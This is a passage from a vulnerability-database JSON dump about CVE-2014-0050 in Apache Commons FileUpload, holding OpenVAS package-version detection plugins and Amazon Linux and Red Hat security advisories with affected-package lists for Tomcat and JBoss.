1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702856);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:32:59", "references": ["https://alas.aws.amazon.com/ALAS-2014-312.html"], "pluginID": "1361412562310120359", "description": "Amazon Linux Local Security Checks", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: ALAS-2014-312", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120359", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-312.nasl 6692 2017-07-12 09:57:43Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120359\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:34 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-312\");\n script_tag(name:\"insight\", value:\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\");\n script_tag(name:\"solution\", value:\"Run yum update tomcat7 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"tomcat7-docs-webapp\", rpm:\"tomcat7-docs-webapp~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-lib\", rpm:\"tomcat7-lib~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-webapps\", rpm:\"tomcat7-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-el\", rpm:\"tomcat7-el~2.2~api~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-javadoc\", rpm:\"tomcat7-javadoc~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-jsp\", rpm:\"tomcat7-jsp~2.2~api~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-admin-webapps\", rpm:\"tomcat7-admin-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7-servlet\", rpm:\"tomcat7-servlet~3.0~api~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-20T16:06:17", "references": ["http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"], "pluginID": "1361412562310807039", "description": "This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-01-25T00:00:00", "title": "Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050", "CVE-2014-6483"], "modified": "2018-09-19T00:00:00", "id": "OPENVAS:1361412562310807039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807039", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_db_mult_unspecified_vuln07_jan16.nasl 11473 2018-09-19 11:21:09Z asteins $\n#\n# Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:oracle:database_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807039\");\n script_version(\"$Revision: 11473 $\");\n script_cve_id(\"CVE-2014-6483\", \"CVE-2014-0050\");\n script_bugtraq_id(65400, 70480);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:21:09 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 14:59:25 +0530 (Mon, 25 Jan 2016)\");\n script_name(\"Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple\n unspecified vulnerabilities in the Application Express component.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploitation will allow remote\n authenticated attackers to affect confidentiality, integrity, and availability\n via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle Database Server version\n before 4.2.6\");\n\n script_tag(name:\"solution\", value:\"Apply patches from below link,\n http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"oracle_tnslsnr_version.nasl\");\n script_mandatory_keys(\"OracleDatabaseServer/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!dbPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dbVer = get_app_version(cpe:CPE, port:dbPort)){\n exit(0);\n}\n\nif(version_is_less(version:dbVer, test_version:\"4.2.6\"))\n{\n report = report_fixed_ver(installed_version:dbVer, fixed_version:\"Apply the appropriate patch\");\n security_message(data:report, port:dbPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:14", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-servlet-3.0-api", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-el-2.2-api", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-lib-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-lib", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "src", "packageFilename": "tomcat7-7.0.47-1.38.amzn1.src.rpm", "packageName": "tomcat7", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-jsp-2.2-api", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-javadoc-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-javadoc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-webapps-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-webapps", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-admin-webapps", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "7.0.47-1.38.amzn1", "arch": "noarch", "packageFilename": "tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch.rpm", "packageName": "tomcat7-docs-webapp", "operator": "lt"}], "description": "**Issue Overview:**\n\nMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch \n tomcat7-7.0.47-1.38.amzn1.noarch \n tomcat7-lib-7.0.47-1.38.amzn1.noarch \n tomcat7-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-javadoc-7.0.47-1.38.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch \n \n src: \n tomcat7-7.0.47-1.38.amzn1.src \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-17T22:54:00", "title": "Medium: tomcat7", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:14", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "modified": "2014-09-17T22:54:00", "id": "ALAS-2014-312", "href": "https://alas.aws.amazon.com/ALAS-2014-312.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:10", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0429.html"], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-webapps-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-webapps", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-admin-webapps", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-javadoc-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-javadoc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-docs-webapp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "src", "packageFilename": "tomcat6-6.0.39-1.4.amzn1.src.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-lib-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-lib", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "6.0.39-1.4.amzn1", "arch": "noarch", "packageFilename": "tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "operator": "lt"}], "description": "**Issue Overview:**\n\nIt was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. A remote attacker could use this flaw to poison a web cache, perform cross-site scripting (XSS) attacks, or obtain sensitive information from other requests. ([CVE-2013-4286 __](<https://access.redhat.com/security/cve/CVE-2013-4286>))\n\nIt was discovered that the fix for [CVE-2012-3544 __](<https://access.redhat.com/security/cve/CVE-2012-3544>) did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default. ([CVE-2013-4322 __](<https://access.redhat.com/security/cve/CVE-2013-4322>))\n\nA denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request. ([CVE-2014-0050 __](<https://access.redhat.com/security/cve/CVE-2014-0050>))\n\n \n**Affected Packages:** \n\n\ntomcat6\n\n \n**Issue Correction:** \nRun _yum update tomcat6_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch \n tomcat6-lib-6.0.39-1.4.amzn1.noarch \n tomcat6-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-6.0.39-1.4.amzn1.noarch \n tomcat6-javadoc-6.0.39-1.4.amzn1.noarch \n tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch \n tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch \n tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch \n \n src: \n tomcat6-6.0.39-1.4.amzn1.src \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-09-18T00:36:00", "title": "Medium: tomcat6", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:10", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "modified": "2014-09-18T00:36:00", "id": "ALAS-2014-344", "href": "https://alas.aws.amazon.com/ALAS-2014-344.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-06-12T21:10:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.3.0-2.Final_redhat_2.1.ep6.el5", "arch": "noarch", "packageName": "jbossweb", "packageFilename": "jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.3.0-2.Final_redhat_2.1.ep6.el5", "arch": "src", "packageName": "jbossweb", "packageFilename": "jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.3.0-2.Final_redhat_2.1.ep6.el6", "arch": "noarch", "packageName": "jbossweb", "packageFilename": "jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.3.0-2.Final_redhat_2.1.ep6.el6", "arch": "src", "packageName": "jbossweb", "packageFilename": "jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el6.src.rpm", "operator": "lt"}], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss\nEnterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat\nEnterprise Linux 5 and 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "reporter": "RedHat", "published": "2014-03-05T05:00:00", "type": "redhat", "title": "(RHSA-2014:0253) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T02:39:08", "id": "RHSA-2014:0253", "href": "https://access.redhat.com/errata/RHSA-2014:0253", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-06T18:05:15", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-webapps", "packageFilename": "tomcat6-webapps-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-jsp-2.1-api", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-servlet-2.5-api", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-lib", "packageFilename": "tomcat6-lib-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-javadoc", "packageFilename": "tomcat6-javadoc-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-docs-webapp", "packageFilename": "tomcat6-docs-webapp-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-admin-webapps", "packageFilename": "tomcat6-admin-webapps-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageName": "tomcat6-el-2.1-api", "packageFilename": "tomcat6-el-2.1-api-6.0.24-64.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "src", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.24-64.el6_5.src.rpm", "operator": "lt"}], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "reporter": "RedHat", "published": "2014-04-23T04:00:00", "type": "redhat", "title": "(RHSA-2014:0429) Moderate: tomcat6 security update", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:30", "id": "RHSA-2014:0429", "href": "https://access.redhat.com/errata/RHSA-2014:0429", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-09T15:50:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", 